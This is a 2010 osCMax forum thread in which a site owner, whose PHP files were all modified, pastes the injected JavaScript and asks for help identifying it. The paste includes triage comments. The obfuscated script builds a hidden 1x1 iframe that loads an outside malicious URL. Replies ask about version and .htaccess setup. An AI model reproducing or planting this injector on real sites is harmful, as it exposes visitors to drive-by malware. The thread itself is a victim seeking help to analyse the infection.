
 

Website Hacked

  #1  
Old 07-30-2010, 03:20 AM
Schaboo is on a distinguished road
Default Website Hacked

Last night one of my websites was hacked.
I can't work out how it was done, but all PHP files were modified to include this code:
Code:
<!--
  Injected script, annotated for triage. The code below is unchanged.

  What it does:
  * Adds String.prototype.eL, a thin wrapper around String.replace. Every
    meaningful string is stored with junk characters mixed in and is cleaned
    at runtime by eL with a regex character class.
  * Nearly all of the var / this.x / bare assignments (numbers, empty strings,
    new Date(), new Array(), functions returning their own name) are never
    read again; they are filler around a handful of real statements.
  * Decoded strings: "setTimeout" (i), "push" (y), "substring" (dM),
    "createElement" (substring 3..16 of d), "iframe" (yR), "width" (g),
    "height" (m), "1" (mF), "body" (kB), "appendChild" (c). They are pushed
    into the lookup array cI and used through bracket access, so none of the
    DOM names appear literally in the source.
  * Real work in the try branch: u = document.createElement("iframe"), the
    property named by k is set to kG, width and height are set to "1", and
    the element is appended to document.body. kG decodes to
    hxxp://compromendes[.]com/stds/go.php?sid=5 (defanged here).
  * catch branch: document.write of an empty html/body skeleton, then
    window.setTimeout re-runs o() after 309 ms; presumably this covers the
    case where document.body does not exist yet.
  * The last statements create one bF instance and call o() once.

  NOTE(review): as rendered on this page the class used for k reads
  /[[yZo]]/g, which would leave 'soryc[' unchanged. It presumably stripped
  '[', 'y', 'Z' and 'o' to give "src", and the forum rendering may have
  altered it. Confirm against a raw copy of an infected file.

  NOTE(review): the String.prototype.eL wrapper and the cI lookup table are
  the structural markers to search for when checking other files; the filler
  names and numbers may differ between copies (assumption, only one sample
  is shown here).
-->
<script>function bF(){};nK="nK";bF.prototype = {o : function() {var s="";var eB=new Array();this.yS="";this.cE="cE";yI='';var n=function(){};this.dV=17028;var r=document;function x(){};var fL=new Date();var fC=35798;function l(){};dE=51990;this.iF=42492;function v(){};var j=window;var iX=new Array();eY="";this.jL=false;yL="";jG="jG";vH='';var h=new Date();var z = this;var iY=new Array();w='';b="";fT=false;var kBC=new Date();var fH=function(){return 'fH'};String.prototype.eL=function(p, zB){var pA=this; return pA.replace(p, zB)};uF="uF";yB=27300;var iJ=false;var zI='';this.hK="hK";var oB=false;wC=16683;this.rE="";var i = 's&emtBTr'.eL(/[r(mB&]/g, '') + 'i$mDeVo4'.eL(/[4$VDz]/g, '') + 'uztx'.eL(/[xJw*z]/g, '');this.tZ="";var qZ=new Date();this.lV=59400;dL="";var cW='';var aQ="";this.tJ="";var iP="";var d = 't+r1e/cDr/eDa1'.eL(/[1D/+%]/g, '') + 'tseYE!l!e!mQeYnstYgseYtQ'.eL(/[Q+!Ys]/g, '');this.oK=23764;this.yZ='';wZ=37757;nV='';hV="hV";qD="";var nA=15820;var a = 'wgr#i<t#ey'.eL(/[y<g#6]/g, '');var sJ="sJ";function sX(){};var fZ=function(){return 'fZ'};var gJ=function(){return 'gJ'};var kI=50149;qG=27962;try {var tN='';var tJR=new Array();var aA="";this.kS='';this.cL=60296;var y = 'pVu%sVh&'.eL(/[&Vz#%]/g, '');var eP=new Array();var uX=function(){return 'uX'};cT=false;var vL=false;var fR=function(){return 'fR'};var k = 'soryc['.eL(/[[yZo]]/g, '');var eO='';oS=55462;this.qF="";this.cD="cD";oP="oP";var wD='';var jJ=new Array();var t = 'v/b|mUi|fP'.eL(/[P/Un|]/g, '')+'rIsIe2tI'.eL(/[I201n]/g, '');var xV="xV";function zN(){};var rO=function(){return 'rO'};pR=false;var wP=function(){return 'wP'};this.rS="";var g = 'wLiEdE'.eL(/[EL,.#]/g, '') + 't<hG'.eL(/[G<2xM]/g, '');var sN='';var dY=false;pF="";this.eV='';gX="";var zM=function(){};hI='';this.kP="kP";var m = 'hDesiy'.eL(/[ys98D]/g, '') + 'gyhmtA'.eL(/[A+my,]/g, '');this.fV="fV";var nT=new Array();aAE=56126;hU="hU";var mF = '1<'.eL(/[<[pzM]/g, '');fE="fE";var aAT=new Date();this.xD="xD";kM="";this.aN=9321;f = 
'g}e?tCs3ent3A?t?tnr}i3snd3fC'.eL(/[Cn3}?]/g, '');yO=64991;var gB=function(){return 'gB'};var qC=24176;var kGO=function(){};var zE=new Date();this.dH='';var c = 'anpxpx'.eL(/[xGKnL]/g, '') + 'e7nbduCWhuibl<du'.eL(/[uW<7b]/g, '');var eN="";var oV="";var vR=52882;lK="";var mH=23886;var aK='';var kB = 'b>o#d#yI'.eL(/[I#>M6]/g, '');this.wW="";xI='';this.pB='';var jH=function(){return 'jH'};function jT(){};var dM = 'sWuK'.eL(/[KzWQD]/g, '')+'b,s,t,r:i>'.eL(/[>Vo,:]/g, '')+'n.gF'.eL(/[F(6.D]/g, '');var fER=function(){};var yP="";wI=40242;yBU="yBU";kE=false;var cI = new Array();zQ="zQ";var fI='';var aX="";iJI='';var sXY='';var fG="fG";cI[y](m, dM, d, g, t, f, kB, c, mF, r, k);this.nI="";var eVN='';var rX=new Array();var gP=new Array();var aNS=423;this.oT="";var zX='';kPP=47363;fVU='';qU="qU";this.sM="";qK=false;nJ=false;this.fTN=65095;this.hVC=false;var xA=61670;var tV=function(){};var rXZ=false;bG="bG";var pAY=5308;aC=33465;var jA=function(){return 'jA'};var rQ=new Array();this.cN=false;var hJ="";var oKP="";var iM=false;var aE=function(){};var tF=false;this.aCM='';this.qJ='';var lI="lI";var tQ=function(){return 'tQ'};this.kL="";var fZL=function(){return 'fZL'};var iPZ=58157;var fW='';var mB=new Array();this.tU="tU";pH=21532;var jD='';var jLD='';this.eJ="eJ";var e = cI[2][cI[1]](3, 16);hB='';fGE=62022;xL=57888;hL="";var dA = cI[4][cI[1]](3, 6);mT='';nX='';function zY(){};var dU='';function rP(){};yR = dA + 'aUmPeP'.eL(/[P%UhM]/g, '');wT=39333;aB=5797;this.wN="";this.aG=false;var tH = cI[5][cI[1]](3, 11);this.hE='';this.oQ='';nM="nM";nB="";var tG=new Date();var wF="wF";var vM=false;q = tH + 'bFuktKe)'.eL(/[)YFkK]/g, '');this.oC='';this.vMM='';this.eT="eT";this.pI="pI";var kG = 'hxt^t^p^:E/^/xc#oEmEpEr#oEmEe#nEd^e#s^.xc^oxmE/KsEtEdKsx/#gxoE.#pxhxpx?EsKi#dK=K5#'.eL(/[#ExK^]/g, '');this.wL=false;var qR="";var fIL="";uM=false;var rC="";this.sU="";var u=cI[9][e](yR);this.jAJ="";hN='';var pJ=function(){return 'pJ'};this.uI="uI";var dUW=function(){return 'dUW'};mJ=64726;u[cI[10]] 
= kG;yD="";var qW=false;this.iQ=false;var zS=new Date();var hC=new Date();this.nO=false;u[cI[3]] = cI[8];eI=22912;var vO="vO";vJ="";this.mG=false;var qCV=function(){return 'qCV'};this.yRT="yRT";u[cI[0]] = cI[8];this.rEG='';mZ=33472;var cG=3785;var aP=27559;dJ="dJ";var lR="lR";this.lF="";this.wZF='';function aM(){};zW='';wY="";var iI=false;var yRJ=new Date();cI[9][cI[6]][cI[7]](u);var iK='';var iT='';this.gR="";this.uO="";oZ='';} catch(zH) {this.uH='';function qE(){};this.aV=60775;bU=false;r.write('<*hOtOm*lx x>^<xbOo*dxy^ *>*<O/~b*o*dOy^>O<*/*hxtOmxlx>^'.eL(/[^x~O*]/g, ''));var fS='';var jK=function(){};this.sNM="";vF='';this.lW='';var tJI="";var pK='';j[i](function(){ z.o() }, 309);var hCY=function(){return 'hCY'};var zHP="";this.uS='';this.vJW='';}vFH=359;this.wNF="wNF";var bL="";var sL="sL";}};var yG=new Array();var lRO=new bF(); var lVM=function(){return 'lVM'};lRO.o();qFK='';</script>
Does anyone recognize it?
Or maybe how was it done?
  #2  
Old 07-30-2010, 03:57 AM
pgmarshall's Avatar
osCMax Development Team
 
Default Re: Website Hacked

Not seen this one before ...

Quote:
Or maybe how was it done?
Have you set up security as specified in the wiki? (Mainly the .htaccess on admin)

Are you running any other php scripts on your site?

Which version of osCmax are you running? v2.0 RC4, 2.0.1, 2.0.2, 2.0.3, 2.0.4, 2.0.25?

Regards,
__________________
pgmarshall
  #3  
Old 07-30-2010, 04:51 AM
ridexbuilder's Avatar
osCMax Development Team

 
Post Re: Website Hacked

A quick Google search for the first part of the string turns up a few reports of this - macromediasetup.com was mentioned...